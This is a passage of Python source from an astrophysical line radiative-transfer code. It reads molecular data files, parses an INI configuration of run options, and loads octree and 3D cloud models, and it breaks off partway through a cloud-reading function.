    \n    def C(self, upper, lower, Tkin, partner):\n        \"\"\"\n        Return collision coefficient upper -> lower for given kinetic temperature Tkin and\n        collision partner with index partner. Note, Tkin can be a vector.\n        \"\"\"\n        if (upper==lower): return 0.0\n        if (partner>=self.PARTNERS):\n            print(\"MoleculeO.C() called for partner %d, only %d partners exist\" % (partner, self.PARTNERS))\n        c = self.CC[ partner]    # collision coefficients upwards [:, ntkin]\n        ul = self.CUL[ partner]  # each row = (upper, lower), already with 0-offset values\n        T = self.TKIN[partner]   # Tkin array for this partner\n        # the input file contains rates upper -> lower\n        u, l = max([upper, lower]), min([upper,lower])   # real upper and lower\n        m = nonzero((ul[:,0]==u)&(ul[:,1]==l))   # find the row in C array\n        if (len(m[0])<1): return 0.0\n        ip = interp1d(T, c[m[0][0],:])   # interpolation over temperature\n        try:\n            res = ip(clip(Tkin, T[0], T[-1]))\n        except:\n            print(\"MOL.C failed --- TKIN defined %.1f-%.1f\" % (T[0], T[-1]))\n            print(Tkin)\n            sys.exit()\n        if (upper<lower):   # upward rate => calculate based on stored downward rates\n            # Clu = Cul gu/gl exp(-(Eu-El)/kT), l=\"upper\", u=\"lower\" !\n            res *= (self.G[lower]/self.G[upper]) * np.exp(-H_K*(self.E[lower]-self.E[upper])/Tkin)\n        return res\n
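    # Illustrative use of C() (values hypothetical): the downward rate 1->0 at\n    # Tkin=20 K for collisional partner 0, and the upward rate 0->1 that then\n    # follows from detailed balance using the G and E arrays:\n    #   cul = MOL.C(1, 0, 20.0, 0)\n    #   clu = MOL.C(0, 1, 20.0, 0)   # = cul*(G[1]/G[0])*exp(-H_K*(E[1]-E[0])/20.0)\n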
    \n    def Read(self, filename):\n        \"\"\"\n        Read Lamda description of the molecule.\n        \"\"\"\n        fp = open(filename, 'r')\n        fp.readline()   # comment\n        self.NAME = fp.readline().split()[0].replace(',','')   # name\n        fp.readline()   # comment\n        self.WEIGHT = float(fp.readline().split()[0])   # weight\n        fp.readline()   # comment\n        self.LEVELS = int(fp.readline().split()[0])   # number of energy levels\n        tmp = fp.readline()   # comment\n        d = loadtxt(fp, max_rows=self.LEVELS, usecols=(0,1,2))   # energy table\n        self.G = asarray(d[:,2].copy(), float32)\n        self.E = asarray(C_LIGHT*d[:,1], float32)   # [Hz], for each level\n        fp.readline()   # comment\n        self.TRANSITIONS = int(fp.readline().split()[0])   # number of transitions\n        fp.readline()   # comment\n        d = loadtxt(fp, max_rows=self.TRANSITIONS, usecols=(0,1,2,3,4))   # Einstein A array\n        d.shape = (self.TRANSITIONS, 5)\n        self.TRANSITION = asarray(d[:,1:3], np.int32)-1\n        self.A = asarray(d[:,3], float32)\n        self.F = asarray(d[:,4]*1.0e9, float32)\n        fp.readline()   # comment\n        self.PARTNERS = int(fp.readline().split()[0])   # number of collisional partners\n        self.PNAME = []\n        self.TKIN = []\n        self.CC = []\n        self.CUL = []    # for C array, upper and lower levels\n        self.CABU = []   # abundances of collisional partners\n        for ipartner in range(self.PARTNERS):\n            print(\"**** READING MOLECULE PARTNER: %d !!!!!\" % ipartner)\n            # one partner = one entry in { PNAME, TKIN, CUL, CC }\n            fp.readline()   # !COLLISIONS BETWEEN\n            self.PNAME.append(fp.readline().split()[1])   # name ?\n            fp.readline()   # comment\n            nc = int(fp.readline().split()[0])   # number of transitions\n            fp.readline()   # comment\n            line = fp.readline()\n            nt = int(line.split()[0])   # number of temperatures\n            # can have optional abundance OF COLLISIONAL PARTNER after the temperature value !!!\n            try:\n                cabu = float(line.split()[1])\n                self.CABU.append(cabu)\n            except:\n                if (1):\n                    self.CABU.append(1.0/self.PARTNERS)\n                    print(\"*** WARNING -- molecule file did not contain abundances of collisional\")\n                    print(\"    partners, abundance set to %.3f !!!!!!!!!!!!!!!!!!!!!!!\" % (1.0/self.PARTNERS))\n            fp.readline()   # comment\n            T = loadtxt(fp, max_rows=1)   # Tkin vector\n            self.TKIN.append(ravel(asarray(T, np.float32))) \n            fp.readline()   # comment\n            d = loadtxt(fp, max_rows=nc)   # the array\n            if (len(d.shape)==1): d.shape = (1, len(d))\n            self.CUL.append( asarray(d[:,1:3], np.int32)-1 )   # (upper, lower) --- zero offset values\n            self.CC.append( asarray(d[:,3: ], np.float32))    # collisional coefficients\n            # next line is again \"!COLLISIONS BETWEEN\"\n        if (1):\n            \"\"\"\n            Kernel will later assume that *NTKIN is the same* for all collisional\n            partners, although coefficients are interpolated independently for each partner.\n            One could interpolate ipartner>0 coefficients for the TKIN grid of the\n            first partner ipartner=0, but that would mean *two* linear interpolations with\n            some loss of precision.\n            Instead, we will just pad the arrays to have the same dimensions and have\n            NTKIN equal to the maximum over the NTKIN values of individual partners.\n            The collisional coefficient for the highest listed temperature is used to fill in \n            the missing entries for the additional higher temperatures (hopefully those\n            temperatures do not exist in the model!).\n            \"\"\"\n            new_ntkin = 0 \n            for ipartner in range(self.PARTNERS): \n                new_ntkin = max(new_ntkin, len(self.TKIN[ipartner]))\n                print(\"    partner %d has %d Tkin values\" % (ipartner, len(self.TKIN[ipartner])))\n            # go through the data, pad self.TKIN[ipartner] and self.CC[ipartner] with\n            # more temperatures, if necessary\n            for ipartner in range(self.PARTNERS):\n                n = len(self.TKIN[ipartner])\n                if (n<new_ntkin):   # pad with copies of the highest-temperature data\n                    m = new_ntkin-n\n                    self.TKIN[ipartner] = concatenate((self.TKIN[ipartner], self.TKIN[ipartner][-1]+arange(1, m+1)))\n                    self.CC[ipartner] = concatenate((self.CC[ipartner], tile(self.CC[ipartner][:,-1:], (1, m))), axis=1)\n        if (1):\n            \"\"\"\n            Check that all partners list the same transitions, in the same order:\n            we assume that ipartner=0 has the necessary transitions and all\n            self.CC[ipartner] arrays for ipartner>0 are rearranged to the same size and order.\n            If this is not ok.... one should edit the molecule file before running LOC!\n            \"\"\"\n            # print(self.CC[1][:,0])\n            for ipartner in range(1, self.PARTNERS):\n                redo = False\n                rows = self.CUL[0].shape[0]\n                cols = len(self.TKIN[0])\n                if (self.CUL[0].shape[0]!=self.CUL[ipartner].shape[0]): \n                    redo = True\n                else:   # check each transition\n                    for i in range(rows):\n                        if ((self.CUL[0][i][0]!=self.CUL[ipartner][i][0])|(self.CUL[0][i][1]!=self.CUL[ipartner][i][1])):\n                            redo = True\n                if (redo==False): continue   # nothing to do, partner lists the same transitions in the same order\n                tmp = zeros((rows,cols), float32)   # recreate the array of collisional coefficients for ipartner\n                for i in range(rows):\n                    u, l = self.CUL[0][i,:]   # new u->l for row i\n                    for j in range(self.CUL[ipartner].shape[0]):\n                        uu, ll = self.CUL[ipartner][j,:]\n                        if ((u==uu)&(l==ll)):   # transition found also in the original array for ipartner\n                            tmp[i,:] = self.CC[ipartner][j,:]\n                            # note: if the transition u->l is not found for the current collisional partner ipartner,\n                            # the corresponding collisional coefficients in CC[] will remain zero\n                            break\n                self.CUL[ipartner] = self.CUL[0].copy()   # all partners now have the same transitions\n                self.CC[ipartner] = tmp.copy()            # in the same order\n            # Each partner can still have different TKIN values but the number of TKIN values is the same\n            # => kernel will use TKIN vector of each collisional partner separately\n            print(\"\")\n            print(\"================================================================================\")\n            print(\" Molecule file has different temperature grids and/or different transitions\")\n            print(\"listed for different collisional partners.\")\n            print(\" In LOC calculations, all partners must have collisional coefficients defined\")\n            print(\"for the *same transitions* and in the *same order* (as for the first partner).\")\n            print(\"They also must have the *same number of Tkin values* although the actual\")\n            print(\"Tkin values in the temperature grid can be different for different partners.\")\n            print(\"    The above is automatically fixed when LOC reads the molecule file. 
One could\")\n            print(\"also consider converting the input molecule file to fulfill these conditions\")\n            print(\"already before running LOC. This might be needed, for example, to deal with\")\n            print(\"partially missing collisional coefficient (some collisional partner,\")\n            print(\"some transitions), which are now by default simply set to zero.\") \n            print(\"================================================================================\")\n            print(\"\")\n            time.sleep(2)\n        # print(self.CC[1][:,0])\n        # sys.exit()\n        ###\n        self.CABU = asarray(self.CABU, np.float32)\n        # self.TKIN = asarray(self.TKIN, np.float32)\n        self.Init()\n        if (0):\n            for t in range(self.TRANSITIONS):\n                u, l = self.T2L(t)\n                print(\" %2d -> %2d  F= %12.4e  E= %12.4e  A= %12.4e\" % (u, l, self.F[t], self.E[u], self.A[t]))\n            print(self.CUL[0])\n            print(self.CC[0])\n            sys.exit()\n    \n    \n    def Partition(self, u, T):\n        \"\"\"\n        Return partition function value\n        \"\"\"\n        # if ((u<0)|(u>=self.LEVELS)): return 0.0\n        return (self.G[u]*np.exp(-H_K*self.E[u]/T)) / sum(self.G[:]*np.exp(-H_K*self.E[:]/T))\n    \n    \n    def Init(self):\n        \"\"\"\n        Precalculate GG, B, BB\n        \"\"\"\n        # GG\n        self.GG = np.zeros(self.TRANSITIONS, np.float32)\n        for tr in range(self.TRANSITIONS):\n            u, l = self.T2L(tr)\n            self.GG[tr] = self.G[u]/self.G[l]\n        # B\n        self.B = asarray( self.A*C_LIGHT*C_LIGHT/(2.0*PLANCK*double(self.F)**3.0) , float32 )\n        # BB\n        self.BB = self.GG * self.A * (C_LIGHT/self.F)**2.0 / (8.0*pi)\n\n
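    # The precomputed arrays follow the standard Einstein relations:\n    #   B  = A*c^2/(2*h*nu^3)            (stimulated emission)\n    #   BB = (gu/gl)*A*(c/nu)^2/(8*pi)   (per transition)\n    # so Init() must be called again whenever A, F, or G are modified.\n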
\n    \n    def Transitions(self, levels):\n        \"\"\"\n        Update self.TRANSITION array so that it contains only transitions between levels < levels.\n        \"\"\"\n        print(\"Transitions(%d) from TRANSITIONS=%d\" % (levels, self.TRANSITIONS))\n        # print(self.TRANSITION)\n        ok = np.zeros(self.TRANSITIONS, np.int32)\n        for i in range(self.TRANSITIONS):   # loop over original array\n            a, b = self.TRANSITION[i,:]\n            if ((a<levels)&(b<levels)): ok[i] = 1\n        m = nonzero(ok>0)   # only these transitions remain\n        # TRANSITION[], A[], and F[] may be truncated = higher levels dropped\n        self.TRANSITION = asarray(self.TRANSITION[m[0],:], np.int32)\n        self.A = asarray(self.A[m[0]], np.float32)\n        self.B = asarray(self.B[m[0]], np.float32)\n        self.BB = asarray(self.BB[m[0]], np.float32)\n        self.F = asarray(self.F[m[0]], np.float32)\n        self.TRANSITIONS = len(m[0])   # number of radiative transitions\n        self.GG = np.zeros(self.TRANSITIONS, np.float32)   # G indexed with level, GG with transition!\n        for t in range(self.TRANSITIONS):\n            u, l = self.T2L(t)\n            self.GG[t] = self.G[u]/self.G[l]\n            # print(\" %2d -> %2d  F= %12.4e  A= %12.4e\" % (u, l, self.F[t], self.A[t]))\n        # Drop also higher levels... that would otherwise be included in partition function\n        if (levels<self.LEVELS):\n            self.LEVELS = levels\n            self.E = self.E[0:levels]\n            self.G = self.G[0:levels]\n        print(\"Transitions => %d\" % self.TRANSITIONS)\n        return self.TRANSITIONS\n    \n    \n    \n##########################################################################################\n##########################################################################################\n \n\ndef Planck(F, T):\n    return 2.0*PLANCK*((F/C_LIGHT)**2.0)*F / (np.exp((H_K*F/T))-1.0)\n\n\n\ndef ReadIni(filename):\n    global PLANCK\n    INI = {\n    'nside'         : 1,            # Healpix NSIDE parameter, to generate ray directions\n    'Tex'           : [],           # save excitation temperatures for listed transitions\n    'spectra'       : [],           # save spectra for listed transitions\n    'losspectrum'   : 0,            # contribution of LOS steps to one spectrum, 1=escaped, 2=emitted (no fg absorptions)\n    'direction'     : [0.0, 0.0],   # (theta, phi), the direction towards the observer\n    'points'        : [10,10],      # number of pixels in the output maps\n    'cooling'       : 0,            # save cooling rates \n    'coolfile'      : 'brute.cool',\n    'mapview'       : [],           # theta, phi, nx, ny, (x,y,z) map centre\n    'GPU'           : 0 ,           # use GPU instead of CPU\n    'platforms'     : [0,1,2,3,4],  # OpenCL platforms to try\n    'idevice'       : 0,            # selected device within the platform (for given device type)\n    'sdevice'       : '',           # string used to select the OpenCL device\n    'load'          : '',           # file to load saved level populations\n    'save'          : '' ,          # file to save calculated level populations\n    'iterations'    : 1,            # number of iterations (field simulation + level population updates)\n    'stop'          : 1.0e-5,       # stopping condition, based on relative change in level populations\n    'uppermost'     : 999,          # uppermost level to check in connection with 'stop'\n    'cabfile'       : '',           # abundance file for collisional partners\n    'constant_tkin' : 0,            # assume constant Tkin for the whole model\n    'nray'          : 64,           # number of rays (1D models)\n    'alpha'         : 1.0,          # parameter to adjust placement of rays (1D models)\n    'nray_spe'      : -1 ,          # number of rays to calculate spectra for (1D models)\n    'Tbg'           : 2.72548,      # background sky temperature\n    'hfsfile'       : '',           # file describing HFS line structure (HF components in LTE)\n    'with_crt'      : 0 ,           # include CRT files (dust continuum absorption and emission)\n    'overlap'       : '' ,          # include spectral overlap between lines\n    'lowmem'        : 1,            # choose some memory saving options for the kernels\n    'min_sigma'     : 1e30,         # minimum turbulent linewidth in the model\n    'max_sigma'     : 0.0,          # maximum turbulent linewidth in the model\n    'method_x'      : 0,            # not used\n    'LOCAL'         : -1,           # local work group size (overrides the program defaults)\n    'crttau'        : 'crt.opacity',  # name of the file for dust opacity\n    'crtemit'       : 'crt.emission', # name of the file for dust emission\n    'cloud'         : '',           # name of the 'cloud', the file containing densities etc.\n    'octree'        : 0,            # the octree ray-tracing method chosen\n    'clsolve'       : 1,            # solve equilibrium equations on device instead of on the host\n    'offsets'       : 1,            # number of spatial ray offsets per surface element (default=1)\n    'pickle'        : 1,            # save this INI structure to all output files (1D models)\n    'WITH_ALI'      : 1,            # whether to use ALI (can be 0 for octree>=2)\n    'tausave'       : 0,            # save optical depths\n    'coldensave'    : 0,            # save total and molecular column density, mass-weighted LOS Tkin\n    'infallindex'   : -1.0,         # save map of infall index\n    'plweight'      : 1,            # include path-length weighting for octree4 (affects OT4 only)\n    'clip'          : 0.0,          # skip calculations when density below this threshold\n    'damping'       : -1.0,         # with ALI, dampen iterations to damping*old+(1-damping)*new\n    'dnlimit'       : -1.0,         # ni relative change > dnlimit => new = 0.5*old+0.5*new\n    'oneshot'       : 0,            # 
OCTREE=40, single kernel call to cover all rays (given side)\n 'thermaldv' : 1, # if >0, add thermal broadening, otherwise use file values as such\n 'kdensity' : 1.0, # scale volume densities\n 'ktemperature' : 1.0, # scale Tkin\n 'kabundance' : 1.0, # scale fractional abundance\n 'kvelocity' : 1.0, # scale macroscopic velocity\n 'ksigma' : 1.0, # scale microturbulence\n 'maxbuf' : 40, # maximum allocation of rays per root-grid ray\n 'WITH_HALF' : 0, # whether CLOUD is stored in half precision (vx, vy, vz, sigma)\n 'KILL_EMISSION' : 999999, # write spectra ignoring emission from cells >= KILL_EMISSION, 1D models only!!\n 'minmaplevel' : -1, # only hierarky levels level>minmaplevel used in map calculation\n 'MAP_INTERPOLATION': -1, # spatial interpolation in map making\n 'FITS' : 0, # if >0, save spectra and tau as FITS images\n 'FITS_RA' : 0.0, # centre coordinates (deg) of FITS maps\n 'FITS_DE' : 0.0, #\n 'verbose' : 1,\n 'doublecool' : 0, \n 'keys' : [] # store all keywords\n }\n lines = open(filename, 'r').readlines()\n for line in lines: \n s = line.split()\n if (len(s)<1): continue\n if ((line[0:1]=='#')|(s[0]=='#')): continue\n INI['keys'].append(s[0])\n \n if ((s[0].find('mapview')>=0)&(len(s)>=5)): # at least theta, phi, nx, ny -- optionally (xc, yc, zc)\n print(\"mapview, len(s)=%d\" % (len(s)), s)\n tmp = [ float(s[1])*pi/180.0, float(s[2])*pi/180.0, int(s[3]), int(s[4]) ] # theta, phi, NX, NY map parameters\n try:\n mc = [ float(s[5]), float(s[6]), float(s[7]) ] # map centre (xc, yc, zc)\n except:\n mc = [ NaN, NaN, NaN ] # these will be replaced by the default, the cloud centre\n pass\n # theta phi NX NY xc yc zc \n INI['mapview'].append([tmp[0], tmp[1], tmp[2], tmp[3], mc[0], mc[1], mc[2]])\n\n \n if (len(s)>2): # two float arguments\n try:\n a, b = float(s[1]), float(s[2])\n if (s[0].find('points')==0): INI.update({'points': [int(a), int(b)]})\n if (s[0].find('directi')==0): INI.update({'direction': [a*pi/180.0, b*pi/180.0]})\n except:\n pass \n if (len(s)>1): # keywords with one argument\n # spectra and transitions have several int arguments\n if ((s[0].find('spectra')==0)|(s[0].lower().find('tex')==0)|(s[0].find('transition')==0)):\n x = []\n for i in range(1, len(s)):\n try:\n a = int(s[i])\n x.append(a)\n except:\n break\n if (len(x)>0):\n x = asarray(x, np.int32)\n if (s[0].find('spectra')==0): INI.update({'spectra': x})\n if (s[0].lower().find('tex')==0): INI.update({'Tex': x}) \n if (s[0].find('transition')==0): INI.update({'Tex': x})\n if (s[0].find('octree')==0): \n INI.update({'cloud': s[1]})\n if (s[0].find('40')>0): INI['octree'] = 40\n elif (s[0].find('5')>0): INI['octree'] = 5\n elif (s[0].find('4')>0): INI['octree'] = 4\n elif (s[0].find('3')>0): INI['octree'] = 3\n elif (s[0].find('2')>0): INI['octree'] = 2\n elif (s[0].find('1')>0): INI['octree'] = 1\n else: INI['octree'] = 4 # 0 -> 4, default changed 2021-03-14\n print(\"*** OCTREE %d ***\" % INI['octree'])\n \n if (s[0].lower().find(\"fits\")==0): \n INI['FITS'] = 1 \n if (len(s)>2):\n INI['FITS_RA'] = float(s[1])\n INI['FITS_DE'] = float(s[2])\n \n if (s[0].find('cloud')==0): INI.update({'cloud': s[1]})\n if (s[0].find('molec')==0): INI.update({'molecule': s[1]})\n if (s[0].find('load')==0): INI.update({'load': s[1]})\n if (s[0].find('save')==0): INI.update({'save': s[1]}) # make sure tausave and save and not confused\n if (s[0].find('prefix')==0): INI.update({'prefix': s[1]})\n if (s[0].find('cabfile')==0): INI.update({'cabfile': s[1]})\n if (s[0].find('hfsfile')==0): INI.update({'hfsfile': s[1]})\n if 
(s[0].find('overlap')==0): INI.update({'overlap': s[1]}) \n if (s[0].find('crttau')==0): INI.update({'crttau': s[1]})\n if (s[0].find('crtemit')==0): INI.update({'crtemit': s[1]})\n if (s[0].find('device')==0):\n if (s[1].lower()=='c'): INI.update({'GPU': 0})\n elif (s[1].lower()=='g'): INI.update({'GPU': 1})\n else:\n INI.update({'sdevice': s[1]})\n ### 18-08-2021: now specifies a file name if the \"cooling\" keyword exists\n if (s[0].find('cooling')==0):\n INI.update({'cooling': 1})\n INI.update({'coolfile': s[1]})\n # float argument\n try:\n x = float(s[1])\n if (s[0].find(\"isotropic\")==0): INI.update({'Tbg': x})\n if (s[0].find(\"bandwidth\")==0): INI.update({'bandwidth': x})\n if (s[0].find(\"temperature\")==0): INI.update({'ktemperature':x})\n if (s[0].find(\"density\")==0): INI.update({'kdensity': x})\n if (s[0].find(\"fraction\")==0): INI.update({'kabundance': x})\n if (s[0].find(\"abundance\")==0): INI.update({'kabundance': x})\n if (s[0].find(\"velocity\")==0): INI.update({'kvelocity': x})\n if (s[0].find(\"sigma\")==0): INI.update({'ksigma': x})\n if (s[0].find(\"distance\")==0): INI.update({'distance': x})\n if (s[0].find(\"angle\")==0): INI.update({'angle': x})\n if (s[0].find(\"grid\")==0): INI.update({'grid': x})\n if (s[0].find(\"stop\")==0): INI.update({'stop': x}) \n if (s[0].find(\"alpha\")==0): INI.update({'alpha': x})\n if (s[0].find(\"clip\")==0): INI.update({'clip': x})\n if (s[0].find(\"damp\")==0): INI.update({'damping': x})\n if (s[0].find(\"dnlim\")==0): INI.update({'dnlimit': x})\n if (s[0].find(\"infallindex\")==0): INI.update({'infallindex': x})\n except:\n pass\n # int argument\n try:\n x = int(s[1])\n if (s[0].find(\"doublecool\")==0): INI.update({'doublecool': x})\n if (s[0].find(\"channels\")==0): INI.update({'channels': x})\n if (s[0].find(\"iterations\")==0): INI.update({'iterations': x})\n if (s[0].find(\"uppermost\")==0): INI.update({'uppermost': x})\n if (s[0].find(\"nside\")==0): INI.update({'nside': x})\n if (s[0].find(\"gpu\")==0): INI.update({'GPU': x})\n if (s[0].find(\"GPU\")==0): INI.update({'GPU': x})\n if (s[0].find(\"levels\")==0): INI.update({'levels': x})\n if (s[0].find(\"speray\")==0): INI.update({'nray_spe': x})\n if (s[0].find(\"nray\")==0): INI.update({'nray': x}) \n if (s[0].find('offsets')==0): INI.update({'offsets': x})\n if (s[0].find('lowmem')==0): INI.update({'lowmem': x})\n if (s[0].find('clsolve')==0): INI.update({'clsolve': x}) \n if (s[0].find('LOCAL')==0): INI.update({'LOCAL': x})\n if (s[0].find('local')==0): INI.update({'LOCAL': x})\n if (s[0].find(\"ALI\")==0): INI.update({'WITH_ALI': x})\n if (s[0].find(\"ali\")==0): INI.update({'WITH_ALI': x})\n if (s[0].find(\"fits\")==0): INI.update({'FITS': x})\n if (s[0].find(\"verbose\")==0): INI.update({'verbose': x})\n if (s[0].find(\"tausave\")==0): INI.update({'tausave': x})\n if (s[0].find(\"colden\")==0): INI.update({'coldensave': x})\n if (s[0].find(\"plweight\")==0): INI.update({'plweight': x})\n if (s[0].find(\"oneshot\")==0): INI.update({'oneshot': x})\n if (s[0].find(\"thermaldv\")==0): INI.update({'thermaldv': x})\n if (s[0].find(\"maxbuf\")==0): INI.update({'maxbuf': x})\n if (s[0].find(\"half\")==0): INI.update({'WITH_HALF': x})\n if (s[0].find(\"killemi\")==0): INI.update({'KILL_EMISSION': x}) # kill all emission from cells>x, 1D models only!!\n if (s[0].find('minmaplevel')==0): INI.update({'minmaplevel' : x})\n if (s[0].find(\"mapint\")==0): INI.update({'MAP_INTERPOLATION': x})\n if (s[0].find('losspec')==0): INI.update({'losspectrum': x}) # 1=escaped (observed) 
radiation, 2=emitted radiation without foreground absorption \n if (s[0].find(\"platform\")==0): \n INI.update({'platforms': [x,]})\n if (len(s)>2): # user also specifies the device within the platform\n try:\n INI.update({'idevice': int(s[2])})\n except:\n idevice = 0\n except:\n pass \n # keywords without arguments\n if (s[0].find('cool')==0): INI.update({'cooling': 1})\n if (s[0].find('constant_tkin')==0): INI.update({'constant_tkin': 1})\n if (s[0].find('crtdust')==0): INI.update({'with_crt': 1})\n if (s[0].find('pickle')==0): INI.update({'pickle': 1})\n if (s[0].find('methodx')==0): INI.update({'method_x': 1})\n # if (s[0].find('losspec')==0): INI.update({'losspectrum': 1}) # 1=escaped radiation, 2=emitted radiation without foreground absorption\n #if (s[0].find(\"FITS\")==0): INI.update({'FITS': 1})\n #if (s[0].find(\"fits\")==0): INI.update({'FITS': 1})\n \n # one can use \"direction\" and \"points\", map centred on the cloud centre\n # if mapview is given, direction and points will be ignored\n if (len(INI['mapview'])<1):\n # theta phi nx ny xc yc zc \n INI['mapview'].append(\n [INI['direction'][0],INI['direction'][1],INI['points'][0],INI['points'][1], NaN, NaN, NaN])\n # some allocations depend on map size => update INI['points'] with the maximum values\n max_nra, max_nde = 0, 0\n for i in range(len(INI['mapview'])):\n max_nra = max(max_nra, INI['mapview'][i][2])\n max_nde = max(max_nde, INI['mapview'][i][3])\n INI['points'] = [ max_nra, max_nde]\n # INI['direction'] is no longer needed\n INI['direction'] = []\n return INI\n\n\n\ndef ReadMolecule(molname):\n \"\"\"\n Read molecule\n \"\"\"\n MOL = MoleculeO()\n if (os.path.exists(molname)):\n MOL.Read(molname)\n else:\n MOL.Read('%s/%s' % ('/home/mika/tt/MOL/', molname))\n return MOL\n\n\n\ndef ReadCloudOT(INI, MOL):\n \"\"\"\n Read and rescale an octree cloud.\n Usage:\n RHO, TKIN, CLOUD, ABU, CELLS, OTL, LCELLS, OFF, NX, NY, NZ = ReadCloudOT(INI, MOL)\n Return:\n RHO[cells], vector of volume densities\n TKIN[cells], vector of kinetic temperatures\n CLOUD[cells], float4 ~ [vx, vy, vz, sigma], sigma = line width\n ABU[cells], vector of abundances\n CELLS, total number of cells\n OTL, number of levels in the octree hierarchy\n OFF, offsets within a parameter vector to the first entry on a level of hierarchy\n NX, NY, NZ, dimensions of the root grid\n File format:\n NX, NY, NZ, OTL, CELLS = dimensions (x, y, z), number of levels (OTL), number of cells\n this is followed by data for rho[], T[], sigma[], vx[], vy[], vz[], ABU[] ;\n each of these vectors consist of:\n lcells0, vector0, lcells1, vector1, ...\n i.e. 
number of cells on the hierarchy level and the values for the cells on that\n hierarchy level.\n The cloud hierarchy is defined by rho[], values <=0.0 are links to child cells.\n For sigma, use convention of having values <-1e10 for cells other than leaf nodes\n Could use the same for (vx, vy, vz).\n In addition tho WHO, we could have actual links as part of the parameters vectors only \n for TKIN and sigma...\n \"\"\"\n fp = open(INI['cloud'], 'rb')\n NX, NY, NZ, OTL, CELLS = fromfile(fp, int32, 5) # OTL = octree levels\n print(\"ReadCloudOT(%s): \" % INI['cloud'], NX, NY, NZ, OTL, CELLS)\n LCELLS = zeros(OTL, int32)\n OFF = zeros(OTL, int32)\n # rho, tkin, sigma, vx, vy, vz, abu = 6*4 bytes per cell\n # 100 million cells = 2.2 GB\n RHO = zeros(CELLS, float32)\n TKIN = zeros(CELLS, float32)\n WITH_HALF = [0, 1][INI['WITH_HALF']>0]\n if (WITH_HALF==0):\n CLOUD = zeros(CELLS, cl.cltypes.float4) # vx, vy, vz, sigma\n else:\n CLOUD = np.empty((CELLS,4), cl.cltypes.half) # vx, vy, vz, sigma\n ABU = zeros(CELLS, float32)\n \"\"\"\n For density, values <= 0 correspond to links to child cells.\n For the other quantities, use the convention val<-1e10 to indicate that the cell is not a leaf node.\n \"\"\"\n # density\n cells = 0\n for level in range(OTL):\n if (level>0): OFF[level] = OFF[level-1] + cells # cells = cells on the previous level\n cells = fromfile(fp, int32, 1)[0]\n print(\" level %2d cells %6d\" % (level, cells))\n if (cells<1): break\n LCELLS[level] = cells\n tmp = fromfile(fp, float32, cells)\n if (INI['kdensity']!=1.0): tmp[nonzero(tmp>0.0)] *= INI['kdensity'] # no scaling if cell contains a link\n RHO[(OFF[level]):(OFF[level]+cells)] = tmp\n # temperature\n for level in range(OTL):\n cells = fromfile(fp, int32, 1)[0]\n if (cells!=LCELLS[level]): print(\"Error in the hierarchy file !\"), sys.exit()\n tmp = fromfile(fp, float32, LCELLS[level])\n if (INI['ktemperature']!=1.0): tmp[nonzero(tmp>0.0)] *= INI['ktemperature'] \n TKIN[(OFF[level]):(OFF[level]+cells)] = tmp\n # sigma = turbulent linewidth\n print(\"================================================================================\")\n for level in range(OTL):\n # Note: any NaN values make np.min() np.max() equal to NaN !\n cells = fromfile(fp, int32, 1)[0]\n if (cells!=LCELLS[level]): print(\"Error in the hierarchy file, in sigma !\"), sys.exit()\n tmp = fromfile(fp, float32, cells)\n m = nonzero(RHO[OFF[level]:(OFF[level]+cells)]>0.0) # must ignore sigma for links\n if (len(m[0])>0):\n #print(\"tmp-1 %12.4e %12.4e, ksigma %10.3e\" % (np.min(tmp[m]), np.max(tmp[m]), INI['ksigma']))\n if (INI['ksigma']!=1.0): tmp[m] *= INI['ksigma']\n #print(\"tmp-2 %12.4e %12.4e\" % (np.min(tmp[m]), np.max(tmp[m])))\n #print(\"Tkin %12.4e %12.4e\" % (np.min(TKIN[(OFF[level]):(OFF[level]+cells)][m]), np.max(TKIN[(OFF[level]):(OFF[level]+cells)][m])))\n if (INI['thermaldv']>0): \n tmp[m] = (np.sqrt(tmp**2.0+2.0e-10*BOLTZMANN*TKIN[(OFF[level]):(OFF[level]+cells)]/(AMU*MOL.WEIGHT)))[m]\n # print(\"tmp-3 %12.4e %12.4e\" % (np.min(tmp[m]), np.max(tmp[m])))\n INI['min_sigma'] = min([ INI['min_sigma'], np.min(tmp[m]) ])\n INI['max_sigma'] = max([ INI['max_sigma'], np.max(tmp[m]) ])\n print(\"min_sigma %12.4e, max_sigma %12.4e\" % (INI['min_sigma'], INI['max_sigma']))\n if (WITH_HALF==0):\n CLOUD[(OFF[level]):(OFF[level]+cells)]['w'] = tmp\n else:\n CLOUD[(OFF[level]):(OFF[level]+cells),3] = tmp\n print(\"================================================================================\")\n # vx, vy, vz\n for level in range(OTL):\n cells = fromfile(fp, 
int32, 1)[0]\n if (cells!=LCELLS[level]): print(\"Error in the hierarchy file, in vx !\"), sys.exit()\n tmp = fromfile(fp, float32, LCELLS[level])\n if (INI['kvelocity']!=1.0): tmp *= INI['kvelocity']\n if (WITH_HALF==0):\n CLOUD[(OFF[level]):(OFF[level]+cells)]['x'] = tmp\n else:\n CLOUD[(OFF[level]):(OFF[level]+cells), 0] = tmp\n for level in range(OTL):\n cells = fromfile(fp, int32, 1)[0]\n if (cells!=LCELLS[level]): print(\"Error in the hierarchy file, in vy !\"), sys.exit()\n tmp = fromfile(fp, float32, LCELLS[level])\n if (INI['kvelocity']!=1.0): tmp *= INI['kvelocity']\n if (WITH_HALF==0):\n CLOUD[(OFF[level]):(OFF[level]+cells)]['y'] = tmp\n else:\n CLOUD[(OFF[level]):(OFF[level]+cells), 1] = tmp\n for level in range(OTL):\n cells = fromfile(fp, int32, 1)[0]\n if (cells!=LCELLS[level]): print(\"Error in the hierarchy file, in vz !\"), sys.exit()\n tmp = fromfile(fp, float32, LCELLS[level])\n if (INI['kvelocity']!=1.0): tmp *= INI['kvelocity'] \n if (WITH_HALF==0):\n CLOUD[(OFF[level]):(OFF[level]+cells)]['z'] = tmp\n else:\n CLOUD[(OFF[level]):(OFF[level]+cells), 2] = tmp\n # abundance\n for level in range(OTL):\n cells = fromfile(fp, int32, 1)[0]\n if (cells!=LCELLS[level]): print(\"Error in the hierarchy file, in abundance !\"), sys.exit()\n tmp = fromfile(fp, float32, LCELLS[level])\n if (INI['kabundance']!=1.0): tmp *= INI['kabundance']\n ABU[(OFF[level]):(OFF[level]+cells)] = tmp\n fp.close()\n #\n return RHO, TKIN, CLOUD, ABU, CELLS, OTL, LCELLS, OFF, NX, NY, NZ\n\n\n\n\ndef ReadCloud3D(INI, MOL):\n \"\"\"\n Read and rescale the cloud.\n \"\"\"\n fp = open(INI['cloud'], 'rb')\n nx, ny, nz = fromfile(fp, np.int32, 3)\n cells = nx*ny*nz\n # 0 1 2 3 4 5 6\n # n, T, sigma, vx, vy, vz, x\n try:\n C = 